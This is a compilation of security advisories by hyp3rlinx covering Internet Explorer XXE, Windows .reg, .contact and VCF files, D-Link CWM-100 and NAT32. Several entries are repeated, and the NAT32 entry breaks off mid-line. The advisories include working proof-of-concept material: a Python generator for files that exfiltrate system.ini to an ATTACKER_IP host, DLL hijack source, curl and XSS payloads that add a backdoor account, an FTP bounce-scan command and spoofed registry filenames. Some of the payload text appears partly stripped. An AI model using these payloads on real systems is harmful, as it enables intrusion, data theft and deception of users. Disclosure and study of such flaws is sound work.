"msie-xxe-0day.mht" MHT file. 2) python -m SimpleHTTPServer 3) Place the generated "datatears.xml" in Python server web-root. 4) Open the generated "msie-xxe-0day.mht" file, watch your files be exfiltrated. #Microsoft Internet Explorer XXE 0day #Creates malicious XXE .MHT and XML files #Open the MHT file in MSIE locally, should exfil system.ini #By hyp3rlinx #ApparitionSec ATTACKER_IP="localhost" PORT="8000" mht_file=( 'From:\n' 'Subject:\n' 'Date:\n' 'MIME-Version: 1.0\n' 'Content-Type: multipart/related; type="text/html";\n' '\tboundary="=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_0001"\n' 'This is a multi-part message in MIME format.\n\n\n' '--=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_0001\n' 'Content-Type: text/html; charset="UTF-8"\n' 'Content-Location: main.htm\n\n' 'http://www.w3.org/TR/html4/transitional.dtd;>\n' '\n' '\n' '\n' 'MSIE XXE 0day\n' '\n' '\n' '\n' '\n' '\n' '\n' '%sp;\n' '%param1;\n' ']>\n' '\n' '\n' '\n' '\n' '\n' 'window.print();\n' '\n' '\n' '\n' 'MSIE XML External Entity 0day PoC.\n' 'Discovery: hyp3rlinx\n' 'ApparitionSec\n' '\n' '\n' '\n' '\n' '\n\n\n' '--=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_0001--' ) xml_file=( '\n' '">\n' '\n' '">\n' ) def mk_msie_0day_filez(f,p): f=open(f,"wb") f.write(p) f.close() if __name__ == "__main__": mk_msie_0day_filez("msie-xxe-0day.mht",mht_file) mk_msie_0day_filez("datatears.xml",xml_file) print "Microsoft Internet Explorer XML External Entity 0day PoC." print "Files msie-xxe-0day.mht and datatears.xml Created!." print "Discovery: Hyp3rlinx / Apparition Security" [Network Access] Remote [Severity] High [Disclosure Timeline] Vendor Notification: March 27, 2019 Vendor acknowledgement: March 27, 2019 Case Opened: March 28, 2019 MSRC reponse April 10, 2019: "We determined that a fix for this issue will be considered in a future version of this product or service. At this time, we will not be providing ongoing updates of the status of the fix for this issue, and we have closed this case." April 10, 2019 : Public Di
Microsoft Windows .Reg File Dialog Box Message Spoofing 0day
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-.REG-FILE-DIALOG-BOX-MESSAGE-SPOOFING.txt [+] ISR: ApparitionSec [Vendor] www.microsoft.com [Product] A file with the .reg file extension is a Registration file used by the Windows registry. These files can contain hives, keys, and values. .reg files can be created from scratch in a text editor or can be produced by the Windows registry when backing up parts of the registry. [Vulnerability Type] Windows .Reg File Dialog Box Message Spoofing [CVE Reference] N/A [Security Issue] The Windows registry editor allows specially crafted .reg filenames to spoof the default registry dialog warning box presented to an end user. This can potentially trick unsavvy users into choosing the wrong selection shown on the dialog box. Furthermore, we can deny the registry editor its ability to show the default secondary status dialog box (Win 10), thereby hiding the fact that our attack was successful. Normally when a user opens a .reg file UAC will launch, after they will get the registry security warning dialog box asking them if they "trust the source" and "Are you sure you want to continue?" etc and will also have a choice of either 'Yes' or 'No' to select from. However, we can inject our own messages thru the filename to direct the user to wrongly click "Yes", as the expected "Are you sure you want to continue?" dialog box message is under our control. The registry dialog echoes back the filename plus any text we add and allows us to terminate part of its default security warning message. We achieve this using % encoded characters in the filename like %n or %r and %0. Example, the "do not add it to the registry" and "Are you sure you want to continue?" default warning messages can be done away with using %0. This spoofing flaw lets us spoof the "Are you sure you want to continue?" warning message to instead read "Click Yes" or whatever else we like. Potentially making a user think they are cancelling the registry import as the security warning dialog box is now lying to them. Denial of secondary registry editor status dialog box (hiding successful attacks) in Windows 10: Typically, upon a successful import the registry editor pops up another dialog box with a status message telling us "the keys and values contained in have been successfully added to the registry". We can obstruct that behavior to deny this secondary registry editor dialog from appearing by tacking on a (null) right before the end of our filename using %1 or %25 like: "Microsoft-Security-Update-v1.2-Windows-10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg" If don't want to use (null) use %3 but it will display a asian char instead but still prevents the secondary registry dialog box you. You will have to manually refresh the registry written to in order to see the values stored when using these dialog denial of service methods. Note: Denial of the secondary dialog box seems to only work on Windows 10. Behaviors I discovered playing with registry filenames that affect the dialog box, depending on Windows OS version you will get different results. % - can be used for obfuscation e.g. %h%a%t%e = hate %b will create white-space %n makes a newline %r makes a newline %1 creates (null) - important as we prevent the second registry dialog from appearing after a successful import! %0 Important terminates string %25 (Windows 10) creates (null) - Important as we prevent the second registry dialog from appearing after a successful import! %3 - Important as we prevent the second registry dialog from appearing after a successful import! (but shows asian char) %5 (Windows 10) duplicates the default registry dialog box message by "n" amount of times per amount of %5 injected into the filename %25 (Windows 7) duplicates the default registry dialog box message by "n" amount of times per amount of %25 injected into the filename %2525 prevents registry editor from opening %169 will show our junky filename in the dialog box (we don't want that) %3, %197, %17 and some others change the default language shown in the registry dialog box to asian characters etc Each injected character can be separated by a percent "%" sign without messing up our spoofed message, we can leverage this to obfuscate the end of the filename. We then use %0 to terminate the message string so that the second .reg extension and default registry messages are not displayed in the registry dialog box. The filename "Microsoft-Security-Update-v1.2-Windows-10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg" will show as "Microsoft-Security-Update-v1.2-
[**UPDATED] Microsoft Windows .Reg File Dialog Box Message Spoofing 0day
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-.REG-FILE-DIALOG-BOX-MESSAGE-SPOOFING.txt [+] ISR: ApparitionSec [Vendor] www.microsoft.com [Product] A file with the .reg file extension is a Registration file used by the Windows registry. These files can contain hives, keys, and values. .reg files can be created from scratch in a text editor or can be produced by the Windows registry when backing up parts of the registry. [Vulnerability Type] Windows .Reg File Dialog Box Message Spoofing [CVE Reference] N/A [Security Issue] The Windows registry editor allows specially crafted .reg filenames to spoof the default registry dialog warning box presented to an end user. This can potentially trick unsavvy users into choosing the wrong selection shown on the dialog box. Furthermore, we can deny the registry editor its ability to show the default secondary status dialog box (Win 10), thereby hiding the fact that our attack was successful. Normally when a user opens a .reg file UAC will launch (if user is run as Admin) if targeting a non privleged user we can still hijack HKCU reg settings without having to deal with UAC. After they will get the registry security warning dialog box asking them if they "trust the source" and "Are you sure you want to continue?" etc and will also have a choice of either 'Yes' or 'No' to select from. However, we can inject our own messages thru the filename to direct the user to wrongly click "Yes", as the expected "Are you sure you want to continue?" dialog box message is under our control. The registry dialog echoes back the filename plus any text we add and allows us to terminate part of its default security warning message. We achieve this using % encoded characters in the filename like %n or %r and %0. Example, the "do not add it to the registry" and "Are you sure you want to continue?" default warning messages can be done away with using %0. This spoofing flaw lets us spoof the "Are you sure you want to continue?" warning message to instead read "Click Yes" or whatever else we like. Potentially making a user think they are cancelling the registry import as the security warning dialog box is now lying to them. Denial of secondary registry editor status dialog box (hiding successful attacks) in Windows 10: Typically, upon a successful import the registry editor pops up another dialog box with a status message telling us "the keys and values contained in have been successfully added to the registry". We can obstruct that behavior to deny this secondary registry editor dialog from appearing by tacking on a (null) right before the end of our filename using %1 or %25 like: "Microsoft-Security-Update-v1.2-Windows-10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg" If don't want to use (null) use %3 but it will display a asian char instead but still prevents the secondary registry dialog box you. You will have to manually refresh the registry written to in order to see the values stored when using these dialog denial of service methods. Note: Denial of the secondary dialog box seems to only work on Windows 10. Behaviors I discovered playing with registry filenames that affect the dialog box, depending on Windows OS version you will get different results. % - can be used for obfuscation e.g. %h%a%t%e = hate %b will create white-space %n makes a newline %r makes a newline %1 creates (null) - important as we prevent the second registry dialog from appearing after a successful import! %0 Important terminates string %25 (Windows 10) creates (null) - Important as we prevent the second registry dialog from appearing after a successful import! %3 - Important as we prevent the second registry dialog from appearing after a successful import! (but shows asian char) %5 (Windows 10) duplicates the default registry dialog box message by "n" amount of times per amount of %5 injected into the filename %25 (Windows 7) duplicates the default registry dialog box message by "n" amount of times per amount of %25 injected into the filename %2525 prevents registry editor from opening %169 will show our junky filename in the dialog box (we don't want that) %3, %197, %17 and some others change the default language shown in the registry dialog box to asian characters etc Each injected character can be separated by a percent "%" sign without messing up our spoofed message, we can leverage this to obfuscate the end of the filename. We then use %0 to terminate the message string so that the second .reg extension and default registry messages are not displayed in the registry dialog box. The filename "Microsoft
Microsoft Windows ".contact" File HTML Injection Mailto: Link Remote Code Execution 0day ZDI-CAN-75
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CONTACT-FILE-HTML-INJECTION-MAILTO-LINK-ARBITRARY-CODE-EXECUTION.txt [+] ISR: ApparitionSec [+] Zero Day Initiative Program [+] ZDI-CAN-7591 [Vendor] www.microsoft.com [Product] Microsoft .CONTACT File A file with the CONTACT file extension is a Windows Contact file. They're used in Windows 10, Windows 8, Windows 7, and Windows Vista. This is the folder where CONTACT files are stored by default: C:\Users\[USERNAME]\Contacts\. [Vulnerability Type] Mailto: HTML Link Injection Remote Code Execution [Security Issue] This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Windows. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The flaw is due to the processing of ".contact" files, the E-mail address field takes an expected E-mail address value, however the .CONTACT file is vulnerable to HTML injection as no validation is performed. Therefore, if an attacker references an executable file using an HREF tag it will run that instead without warning instead of performing the expected email behavior. This is dangerous and would be unexpected to an end user. The E-mail addresses Mailto: will point to an arbitrary executable like. p...@microsoft.com Additionally the executable file can live in a sub-directory and be referenced like "p...@microsoft.com" or attackers can use directory traversal techniques to point to a malware say sitting in the targets Downloads directory like: p...@microsoft.com Making matters worse is if the the files are compressed then downloaded "mark of the web" (MOTW) may potentially not work as expected using certain archive utils. This advisory was initially one of three different vulnerabilities I reported to Zero Day Initiative Program (ZDI), that microsoft decided to not release a security fix for and close. The first cases I reported to ZDI were .VCF and .CONTACT files Website address input fields. This example is yet another vector affecting Windows .CONTACT files and is being released as the .CONTACT file issue is now publicly known. [Exploit/POC] Create a Windows .CONTACT file and inject the following HTML into the E-mail: field p...@microsoft.com Windows will prompt you like "The e-mail address you have entered is not a valid internet e-mail address. Do you still want to add this address?" Click Yes. Open the .CONTACT file and click the Mailto: link BOOM! Windows calculator will execute. Attacker supplied code is not limited to .EXE, .CPL or .COM as .VBS files will also execute! :) [POC Video URL] https://vimeo.com/312824315 [Disclosure Timeline] Reported to ZDI 2018-11-22 (ZDI-CAN-7591) Another separate vulnerability affecting MS Windows .contact files affected the Website address input fields and was publicly disclosed January 16, 2019. https://www.zerodayinitiative.com/advisories/ZDI-19-121/ Public disclosure : January 22, 2019 [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
Microsoft Windows VCF File Insufficient UI Warning Remote Code Execution 0day ZDI-CAN-6920
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-VCF-FILE-INSUFFICIENT-WARNING-REMOTE-CODE-EXECUTION.txt [+] ISR: ApparitionSec [+] Zero Day Initiative Program [Vendor] www.microsoft.com [Product] A VCF file is a standard file format for storing contact information for a person or business. Microsoft Outlook supports the vCard and vCalendar features. These are a powerful new approach to electronic Personal Data Interchange (PDI). [Vulnerability Type] Insufficient UI Warning Remote Code Execution [CVE Reference] ZDI-19-013 ZDI-CAN-6920 [Security Issue] This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Windows. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the processing of VCard files. Crafted data in a VCard file can cause Windows to display a dangerous hyperlink. The user interface fails to provide any indication of the hazard. An attacker can leverage this vulnerability to execute code in the context of the current user. [Exploit/POC] 1) create a directory and name it "http" this will house the .CPL executable file. 2) create a .CPL file and give it a website name, I named mine "www.hyp3rlinx.altervista.cpl" or whatever website you wish so it can be referenced in the VCF file. #include /* hyp3rlinx */ /* gcc -c -m32 hyp3rlinx.altervista.c gcc -shared -m32 -o hyp3rlinx.altervista.cpl hyp3rlinx.altervista.o */ void ms_vcf_0day(){ MessageBox( 0, "Continue with install?" , "TrickyDealC0der :)" , MB_YESNO + MB_ICONQUESTION ); } BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason,LPVOID lpvReserved){ switch(fdwReason){ case DLL_PROCESS_ATTACH:{ ms_vcf_0day(); break; } case DLL_PROCESS_DETACH:{ ms_vcf_0day(); break; } case DLL_THREAD_ATTACH:{ ms_vcf_0day(); break; } case DLL_THREAD_DETACH:{ ms_vcf_0day(); break; } } return TRUE; } 3) make sure to rename the executable .DLL extension to a .CPL extension if you did not follow compile instructions above to output as ".CPL". e.g. hyp3rlinx.altervista.dll --> hyp3rlinx.altervista.cpl 4) Create .VCF mail file I named mine "trickyDealC0der.vcf" For the URL in the .VCF Mail file specify a URL like... URL;TYPE=home;PREF=1:http.\\www.hyp3rlinx.altervista.cpl The Windows .VCF File content: "trickyDealC0der.vcf" BEGIN:VCARD VERSION:4.0 N:Tricky;DealC0der;;; FN:TrickyDealC0der EMAIL;TYPE=home;PREF=1:M$@PwnedAgain.com TEL;TYPE="cell,home";PREF=1:tel:+000-000- ADR;TYPE=home;PREF=1:;;1 NYC;NY;;WC2N;USA URL;TYPE=home;PREF=1:http.\\www.hyp3rlinx.altervista.cpl END:VCARD Now, open the "trickyDealC0der.vcf" file and click the website link, the VCF file will traverse back one to the "http" directory where our CPL executable file lives and KABOOM! :) [References] https://www.zerodayinitiative.com/advisories/ZDI-19-013/ [Network Access] Remote [POC Video URL] https://vimeo.com/310684003 [Disclosure Timeline] Notification: Trend Micro Zero Day Initiative Program 2018-07-23 - Vulnerability reported to vendor 2019-01-10 - Coordinated public release of advisory 2019-01-10 - Advisory Updated ADDITIONAL DETAILS 08/06/18 - ZDI reported the vulnerability to the vendor 08/07/18 - The vendor acknowledged the report and provided a tracking # 10/01/18 The vendor requested an additional file 10/03/18 ZDI provided added files and a new PoC 10/03/18 The vendor advised the report did not meet the bar for service 10/05/18 ZDI advised that we believe the report is exploitable and notified the vendor of the intent to 0-day on 10/16/18 10/08/18 The vendor advised ZDI they had re-considered a fix and requested an extension to 01/08/19 10/09/18 ZDI agreed to the short extension 11/14/18 The vendor again advised ZDI of the target patch date 01/08/19 12/12/18 The vendor provided ZDI a CVE 12/19/18 - The vendor wrote to ZDI to advise that engineering team had decided to pursue the fix as v.Next and Microsoft has decided that it will not be fixing this vulnerability and we are closing this case 12/27/18 ZDI notified the vendor of the intent to 0-day on 01/07/18 [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistri
Microsoft Windows VCF File Insufficient UI Warning Remote Code Execution 0day ZDI-CAN-6920
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-VCF-FILE-INSUFFICIENT-WARNING-REMOTE-CODE-EXECUTION.txt [+] ISR: ApparitionSec [+] Zero Day Initiative Program [Vendor] www.microsoft.com [Product] A VCF file is a standard file format for storing contact information for a person or business. Microsoft Outlook supports the vCard and vCalendar features. These are a powerful new approach to electronic Personal Data Interchange (PDI). [Vulnerability Type] Insufficient UI Warning Remote Code Execution [CVE Reference] ZDI-19-013 ZDI-CAN-6920 [Security Issue] This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Windows. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the processing of VCard files. Crafted data in a VCard file can cause Windows to display a dangerous hyperlink. The user interface fails to provide any indication of the hazard. An attacker can leverage this vulnerability to execute code in the context of the current user. [Exploit/POC] 1) create a directory and name it "http" this will house the .CPL executable file. 2) create a .CPL file and give it a website name, I named mine "www.hyp3rlinx.altervista.cpl" or whatever website you wish so it can be referenced in the VCF file. #include /* hyp3rlinx */ /* gcc -c -m32 hyp3rlinx.altervista.c gcc -shared -m32 -o hyp3rlinx.altervista.cpl hyp3rlinx.altervista.o */ void ms_vcf_0day(){ MessageBox( 0, "Continue with install?" , "TrickyDealC0der :)" , MB_YESNO + MB_ICONQUESTION ); } BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason,LPVOID lpvReserved){ switch(fdwReason){ case DLL_PROCESS_ATTACH:{ ms_vcf_0day(); break; } case DLL_PROCESS_DETACH:{ ms_vcf_0day(); break; } case DLL_THREAD_ATTACH:{ ms_vcf_0day(); break; } case DLL_THREAD_DETACH:{ ms_vcf_0day(); break; } } return TRUE; } 3) make sure to rename the executable .DLL extension to a .CPL extension if you did not follow compile instructions above to output as ".CPL". e.g. hyp3rlinx.altervista.dll --> hyp3rlinx.altervista.cpl 4) Create .VCF mail file I named mine "trickyDealC0der.vcf" For the URL in the .VCF Mail file specify a URL like... URL;TYPE=home;PREF=1:http.\\www.hyp3rlinx.altervista.cpl The Windows .VCF File content: "trickyDealC0der.vcf" BEGIN:VCARD VERSION:4.0 N:Tricky;DealC0der;;; FN:TrickyDealC0der EMAIL;TYPE=home;PREF=1:M$@PwnedAgain.com TEL;TYPE="cell,home";PREF=1:tel:+000-000- ADR;TYPE=home;PREF=1:;;1 NYC;NY;;WC2N;USA URL;TYPE=home;PREF=1:http.\\www.hyp3rlinx.altervista.cpl END:VCARD Now, open the "trickyDealC0der.vcf" file and click the website link, the VCF file will traverse back one to the "http" directory where our CPL executable file lives and KABOOM! :) [References] https://www.zerodayinitiative.com/advisories/ZDI-19-013/ [Network Access] Remote [POC Video URL] https://vimeo.com/310684003 [Disclosure Timeline] Notification: Trend Micro Zero Day Initiative Program 2018-07-23 - Vulnerability reported to vendor 2019-01-10 - Coordinated public release of advisory 2019-01-10 - Advisory Updated ADDITIONAL DETAILS 08/06/18 - ZDI reported the vulnerability to the vendor 08/07/18 - The vendor acknowledged the report and provided a tracking # 10/01/18 The vendor requested an additional file 10/03/18 ZDI provided added files and a new PoC 10/03/18 The vendor advised the report did not meet the bar for service 10/05/18 ZDI advised that we believe the report is exploitable and notified the vendor of the intent to 0-day on 10/16/18 10/08/18 The vendor advised ZDI they had re-considered a fix and requested an extension to 01/08/19 10/09/18 ZDI agreed to the short extension 11/14/18 The vendor again advised ZDI of the target patch date 01/08/19 12/12/18 The vendor provided ZDI a CVE 12/19/18 - The vendor wrote to ZDI to advise that engineering team had decided to pursue the fix as v.Next and Microsoft has decided that it will not be fixing this vulnerability and we are closing this case 12/27/18 ZDI notified the vendor of the intent to 0-day on 01/07/18 [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistri
D-LINK Central WifiManager CWM-100 Server Side Request Forgery CVE-2018-15517
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/DLINK-CENTRAL-WIFI-MANAGER-CWM-100-SERVER-SIDE-REQUEST-FORGERY.txt [+] ISR: ApparitionSec ***Greetz: indoushka | Eduardo B.*** [Vendor] us.dlink.com [Product] D-LINK Central WifiManager (CWM 100) Version 1.03 r0098 http://us.dlink.com/products/business-solutions/central-wifimanager-software-controller/ D-Links free Central WiFiManager is a web-based wireless Access Point management tool, enabling you to create and manage multi-site, multi-tenancy wireless networks. [Vulnerability Type] Server Side Request Forgery [Affected Component] MailConnect [CVE Reference] CVE-2018-15517 [Security Issue] Using a web browser or script SSRF can be initiated against internal/external systems to conduct port scans by leveraging D-LINKs MailConnect component. The MailConnect feature on D-Link Central WiFiManager CWM-100 1.03 r0098 devices is intended to check a connection to an SMTP server but actually allows outbound TCP to any port on any IP address, leading to SSRF, as demonstrated by an index.php/System/MailConnect/host/127.0.0.1/port/22/secure/ URI. This can undermine accountability of where scan or connections actually came from and or bypass the FW etc. This can be automated via script or using Web Browser. [Exploit/POC] https://VICTIM-IP/index.php/System/MailConnect/host/port/secure/ reply: OK Scan internal port 22 SSH: https://VICTIM-IP/index.php/System/MailConnect/host/VICTIM-IP/port/22/secure/ reply: OK [Network Access] Remote [Severity] Medium [Disclosure Timeline] Vendor Notification: August 8, 2018 Vendor acknowledgement: August 8, 2018 CVE assigned Mitre: August 18, 2018 Request update: August 31, 2018 No reply from vendor Request update: September 6, 2018 Vendor: "R has begun this month to patch your report." : September 12, 2018 Request update: October 3, 2018 Vendor: "will release a new beta for QA verification by end of this month 10'2018." Request update: October 16, 2018 no reply from vendor Request update: October 23, 2018 Vendor: "It still is schedule to be released by the 31st." : October 23, 2018 Inform vendor of disclosure by November 8, 2018 : October 31, 2018 No reply from vendor November 8, 2018 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
D-LINK Central WifiManager CWM-100 Trojan File SYSTEM Privilege Escalation CVE-2018-15515
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/DLINK-CENTRAL-WIFI-MANAGER-CWM-100-SYSTEM-PRIVILEGE-ESCALATION.txt [+] ISR: ApparitionSec ***Greetz: indoushka | Eduardo B.*** [Vendor] us.dlink.com [Product] D-LINK Central WifiManager (CWM 100) Version 1.03 r0098 http://us.dlink.com/products/business-solutions/central-wifimanager-software-controller/ D-Links free Central WiFiManager is a web-based wireless Access Point management tool, enabling you to create and manage multi-site, multi-tenancy wireless networks. [Vulnerability Type] Trojan File SYSTEM Privilege Escalation [Affected Component] "quserex.dll" [CVE Reference] CVE-2018-15515 [Security Issue] D-Link Central WiFiManager CWM-100 1.03 r0098 devices will load a Trojan horse "quserex.dll" and will create a new thread running with SYSTEM integrity. [Impact] Code Execution as SYSTEM [Exploit/POC] 1) Create 32bit DLL named "quserex.dll" and place in "CaptivelPortal.exe" directory under the DLINK directory 2) Restart the service "CaptivelPortal" 3) Proof, examine using process monitor (sysinternals) #include /* hyp3rlinx */ /* gcc -c -m32 quserex.c gcc -shared -m32 -o quserex.dll quserex.o */ void executo(){ MessageBox(NULL, "Enjoy ur SYSTEM Integrity!", ":)", MB_OK); } BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason,LPVOID lpvReserved){ switch(fdwReason){ case DLL_PROCESS_ATTACH:{ executo(); break; } case DLL_PROCESS_DETACH:{ executo(); break; } case DLL_THREAD_ATTACH:{ executo(); break; } case DLL_THREAD_DETACH:{ executo(); break; } } return TRUE; } [Network Access] Local [Severity] High [Disclosure Timeline] Vendor Notification: August 8, 2018 Vendor acknowledgement: August 8, 2018 CVE assigned Mitre: August 18, 2018 Request update: August 31, 2018 No reply from vendor Request update: September 6, 2018 Vendor: "R has begun this month to patch your report." : September 12, 2018 Request update: October 3, 2018 Vendor: "will release a new beta for QA verification by end of this month 10'2018." Request update: October 16, 2018 no reply from vendor Request update: October 23, 2018 Vendor: "It still is schedule to be released by the 31st." : October 23, 2018 Inform vendor of disclosure by November 8, 2018 : October 31, 2018 No reply from vendor November 8, 2018 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
D-LINK Central WifiManager CWM-100 FTP Server PORT Bounce Scan CVE-2018-15516
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/DLINK-CENTRAL-WIFI-MANAGER-CWM-100-FTP-SERVER-PORT-BOUNCE-SCAN.txt [+] ISR: ApparitionSec ***Greetz: indoushka | Eduardo B.*** [Vendor] us.dlink.com [Product] D-LINK Central WifiManager (CWM 100) Version 1.03 r0098 http://us.dlink.com/products/business-solutions/central-wifimanager-software-controller/ D-Links free Central WiFiManager is a web-based wireless Access Point management tool, enabling you to create and manage multi-site, multi-tenancy wireless networks. [Vulnerability Type] FTP Server PORT Bounce Scan [CVE Reference] CVE-2018-15516 [Security Issue] The FTP Server component of the D-LINK Central WifiManager can be used as a man-in-the-middle machine allowing PORT Command bounce scan attacks. This vulnerability allows remote attackers to abuse your network and discreetly conduct network port scanning. Victims will then think these scans are originating from the D-LINK network running the afflicted FTP Server and not you. [Exploit/POC] D-LINK CWM-100 FTP Server listens on port 9000 (default), default creds are "admin" "admin" nmap -v -b admin:admin@VICTIM-IP:9000 -p 21,22,23,53,445 [POC Video URL] https://vimeo.com/299797225 [Network Access] Remote [Severity] Medium [Disclosure Timeline] Vendor Notification: August 8, 2018 Vendor acknowledgement: August 8, 2018 CVE assigned Mitre: August 18, 2018 Request update: August 31, 2018 No reply from vendor Request update: September 6, 2018 Vendor: "R has begun this month to patch your report." : September 12, 2018 Request update: October 3, 2018 Vendor: "will release a new beta for QA verification by end of this month 10'2018." Request update: October 16, 2018 no reply from vendor Request update: October 23, 2018 Vendor: "It still is schedule to be released by the 31st." : October 23, 2018 Inform vendor of disclosure by November 8, 2018 : October 31, 2018 No reply from vendor November 8, 2018 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
NAT32 Build (22284) Remote Code Execution CVE-2018-6940 (hyp3rlinx / apparition security)
[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/NAT32-REMOTE-COMMAND-EXECUTION-CVE-2018-6940.txt [+] ISR: Apparition Security [-_-] D1rty0tis Vendor: = www.nat32.com Product: = NAT32 Build (22284) NAT32 is a versatile IP Router implemented as a WIN32 application. Vulnerability Type: === Remote Command Execution CVE Reference: == CVE-2018-6940 Security Issue: NAT32 listens on Port 8080 for its Web interface. C:\>netstat -ano | findstr 8080 TCP0.0.0.0:8080 0.0.0.0:0 LISTENING 3720 If the 'Password Checking' (BASIC authentication) feature is NOT enabled (user must select it under config tab) then remote attackers who can reach NAT32 can potentially execute arbitrary commands, if authentication is enabled they will get 'Unauthorized' server reply, however, read on ... e.g. Add user account. C:\>curl "http://x.x.x.x:8080/shell?cmd=run+net+user+D1rty0Tis+abc123+/add; run start net user D1rty0Tis abc123 /add Done If NAT32 'Password Checking' feature IS enabled, remote attackers can STILL potentially issue arbitrary commands exploiting a Cross Site Scripting vulnerability in the HTTPD code of NAT32, if authenticated NAT32 users click a malicious link or visit an attacker controlled webpage. Also worth mentioning, NAT32 implements BASIC authentication which pass BASE64 Encoded credentials which can be easily revealed if sniffed on network. When 'Password Checking' is enabled attackers using Ajax calls via XSS would need to use a combination of '%0D%0A' and double encoding to deal with 'white-space' in order for the payload to stay intact. %25 for '%' sign then 20 (%2520) = %20, using %20 or %2B will not cut it, however '%0D%0A' (CRLF) and '%2520' encoding serves us well. NAT32 has an interesting Command 'EXECR' that can allow attackers to capture Command output response from the server to see right away if an attack was success or not. e.g. Add account and get response (EXECR) HTTP Response: The command completed successfully. execr net user D1rty0Tis abc123 /add Done The NAT32 'winroute' Command will return host route information. XSS response e.g. DestinationMask Nexthop Metric IfIndex Type Proto Age 0.0.0.0 0.0.0.0 192.168.1.210 b4 3 21:41 [min:sec] 127.0.0.0 255.0.0.0 127.0.0.1 306 13 3 22:04 [min:sec] 127.0.0.1 255.255.255.255 127.0.0.1 306 13 3 22:04 [min:sec] 127.255.255.255 255.255.255.255 127.0.0.1 306 13 3 22:04 [min:sec] Exploit/POC: = NET32 Password Checking not enabled... C:\>curl "http://x.x.x.x:8080/shell?cmd=run+net+user+D1rty0Tis+abc123+/add; NAT32 BASIC authentication enabled use XSS... Add backdoor account and capture CMD output using NAT32 'execr' shell command. http://x.x.x.x:8080/shell?cmd=var%0D%0Axhr=new%0D%0AXMLHttpRequest();xhr.onreadystatechange=function(){if(xhr.status==200){alert(xhr.responseText);}};xhr.open('GET','http://x.x.x.x:8080/shell?cmd=execr%2520net%2520user%2520D1rty0Tis%2520abc123%2520/add',true);xhr.send(null); Get Windows Routes (info disclosure): http://x.x.x.x:8080/shell?cmd=%3Cscript%3Evar%0D%0Axhr=new%0D%0AXMLHttpRequest();xhr.onreadystatechange=function(){if(xhr.status==200){alert(xhr.responseText);}};xhr.open(%27GET%27,%27http://x.x.x.x:8080/shell?cmd=winroute%27,true);xhr.send(null);%3C/script%3E Network Access: === Remote Severity: = 